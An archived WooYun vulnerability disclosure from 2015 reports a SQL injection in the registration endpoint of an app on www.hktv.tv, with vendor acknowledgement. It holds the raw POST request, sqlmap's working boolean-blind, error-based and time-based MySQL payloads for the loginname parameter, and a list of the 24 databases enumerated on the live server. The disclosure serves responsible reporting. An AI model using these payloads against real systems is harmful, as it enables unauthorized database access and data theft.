乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
*
光息谷 为云视旗下APP注册处存在POST注入依旧注册抓包
POST /e/extend/new_client_api/register.php HTTP/1.1Host: www.hktv.tvProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 35Connection: keep-aliveUser-Agent: ?????ˉè°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)loginname=11111ddd&password=fffgggg
证明:
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Place: POSTParameter: loginname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: loginname=11111ddd' AND 3771=3771 AND 'bSDS'='bSDS&password=fffgggg Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: loginname=11111ddd' AND (SELECT 6551 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (6551=6551) THEN 1 ELSE 0 END)),0x3a6a64613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fSpK'='fSpK&password=fffgggg Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: loginname=11111ddd' AND SLEEP(5) AND 'eTPF'='eTPF&password=fffgggg---[16:43:08] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[16:43:08] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\www.hktv.tv'[*] shutting down at 16:43:08
数据库列表:
available databases [24]:[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_database
RT
危害等级:高
漏洞Rank:20
确认时间:2015-05-18 17:10
谢谢关注,我们会尽快修复
暂无